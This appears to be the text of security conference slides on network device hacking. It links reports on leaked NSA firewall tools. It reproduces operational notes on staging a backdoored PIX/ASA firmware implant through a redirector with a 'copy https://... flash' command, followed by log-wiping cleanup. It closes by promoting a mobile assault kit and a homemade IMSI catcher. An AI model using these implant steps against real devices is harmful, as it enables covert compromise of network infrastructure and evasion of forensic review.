Presenters: Kevin Cardwell & Wayne Burke

Network Crypto Hacking:

http://thehackernews.com/2016/09/xiaomi-android-backdoor.html

https://securelist.com/blog/incidents/75812/the-equation-giveaway/

http://thehackernews.com/2016/08/nsa-hacking-tools.html

http://thehackernews.com/2016/08/nsa-hack-russia-leak.html

http://thehackernews.com/2016/08/nsa-hack-exploit.html

http://thehackernews.com/2016/08/cisco-firewall-hack.html

http://thehackernews.com/2015/10/nsa-crack-encryption.html

Mystery Solved ??

https://twitter.com/SilentSignalHU/status/768095445444861952?ref_src=twsrc%5Etfw

Diving into tactics :

•In the next few slides we will review some detailed real simple tactics.

•The ultimate goal of eventually owning your entire environment.

# Before you even get to the op, you need to create a PIX/ASA IOS image,# key it, and test it. Bring the image and the key to the op.

########## How to get Apache installed on the ops station ############ cd to the Apache tools directorycd /current/bin/FW/Tools/Apache

# Run this first to get the RPM to install without issuerpm -e httpd httpd-suexec mod_ssl apr-util

# Run this next to load apache rpm'srpm -hiv *.rpm

# In this directory is modified versions of the config files

cp httpd.conf /etc/httpd/conf/httpd.confcp ssl.conf /etc/httpd/conf.d/ssl.conf

Apache Implant – Staging your Hack

# Create a test html fileecho "<html><body>This is a test</body></html>" > /var/www/html/index.html

# Put the image file you want to up/download into this directory with a# common name:cp /mnt/zip/<project>.<ip>_bg2011_pix633.bin /var/www/html/pix633.bin

# Set permissions for items in html directorychmod 744 /var/www/html/*

# Start up the apache serverservice httpd start

# Start up your browser to verify it works.# You should get a pop-up asking to verify the ssl cert.# Then you'll get the index.html page which will say "This is a test".firefox https://127.0.0.1:4443 &

# Setup a remote listener on 443 on redirector to hit apache on 4443-tunnelr 443 127.0.0.1 4443

# Now you are ready to go to the target pix and run this commandcopy https://<ip of redirector>:<port if !443>/<name of image file> flash

# Log off of the pixexit

######## Getting Ops Station Back to normal ########## Once the upload is done, stop apacheservice httpd stop

# Remove installed rpm'srpm -e httpd httpd-suexec mod_ssl apr-util

# Then you need to remove any directories still remaining.rm -rf /var/log/httpd /etc/httpd /var/www

#### OTHER INFO ##### To install apache, you need 3 rpm's:# httpd-2.0.52-19.ent.i386.rpm# httpd-suexec-2.0.52-19.ent.i386.rpm# mod_ssl-2.0.52-19.ent.i386.rpm# apr-util-0.9.4-17.i386.rpm

Scripting the implant:

Game: What does a Hacker See …… …… ?

when using a very cheap single board mobile ARM device…

Lets role play

No Not The APPLE …… Ꙭ

Mobile Assault Kit www.csiswat.com

Sample Commercial Products• PWN PLUG V4 Latest - $1,095.00 – Expensive Open Source Support!!

Can we do better for less?

• Our MAK Base 1 or 2:

A flying Heli IMSI Catcher / Stingray Homemade with BladeRF SDR

Thanks for listening

Wayne Burke:w5432b@csiswat.com

Kevin Cardwell:

k2345c@csiswat.com